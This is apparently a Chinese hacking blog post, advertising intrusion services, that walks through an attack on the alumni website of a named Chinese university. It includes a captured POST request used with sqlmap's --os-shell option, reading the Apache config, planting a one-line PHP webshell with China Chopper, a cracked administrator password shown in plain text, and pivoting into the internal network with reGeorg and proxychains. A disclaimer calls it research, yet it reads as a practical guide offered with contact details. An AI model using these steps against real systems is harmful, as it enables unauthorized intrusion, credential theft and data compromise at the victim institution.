网站入侵

网站入侵,入侵渗透,怎么样入侵网站,黑客怎么拿站,黑客接单

对电子科技大学的一次渗透测试

                       

注:本博客仅供技术研究。如果其信息用于其他目的,用户将承担全部法律和连带责任。本博客不承担任何法律和连带责任。请遵守中华人民共和国安全法

黑客19 – 引领实战潮流,回归技术本质,以行动推动行业技术进步
唯一的联系方式[email protected] 和 [email protected]
欢迎转载,但请注明原始链接,谢谢!

1.成都电子科技大学校友网存在sql可直接注入getshell
POST数据包:

POST http://**.**.**.**/index.php?m=fdirectory&a=search HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip,deflateReferer: http://**.**.**.**/index.php?m=fdirectory&a=searchCookie: PHPSESSID=vd2dte4bh4us82tc1li9lsq9l1Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 157nickname=&sex=&province=5&city=&depart=5&class=&live_province=17&live_city=&stu_no=&out_class_time=2012&industry=10&__hash__=ffb3102d8ace8eab9f471ab9a10ac911

直接扔到sqlmap:sqlmap.py -r xxx.txt –os-shell
获得交互式os-shell,当前用户为apache,降权处理。但是,一些命令仍然可以执行。
查看账号信息:

查看内网IP信息

查看web config配置信息,暴露数据库账号和密码

查看httpd.cong信息
os-shell>cat /etc/httpd/conf/httpd.conf
2.利用os-shell 上传一句木马和菜刀

http://**.**.**.**/1.php

使用获得的数据库帐户密码,直接在数据库中找到后台管理员密码

解密得到明文:admin 87829739 这个密码其实是网站联系方式 电话号码,很容易猜到。网站管理员的安全意识似乎还不够
成功登陆后台

3.内网一步渗透内网
可利用reGeorg ,proxychains 代理 或 SSH进一步渗透内网。

这个渗透教程到此结束!希望大家看看借鉴。如果您有技术咨询,请联系我们
黑客19引领实战潮流,回归技术本质,以行动推动行业技术进步
唯一的联系方式[email protected] 和 [email protected]
欢迎转载,但请注明原始链接,谢谢!

       

发表评论:

Powered By

Copyright Your WebSite.Some Rights Reserved.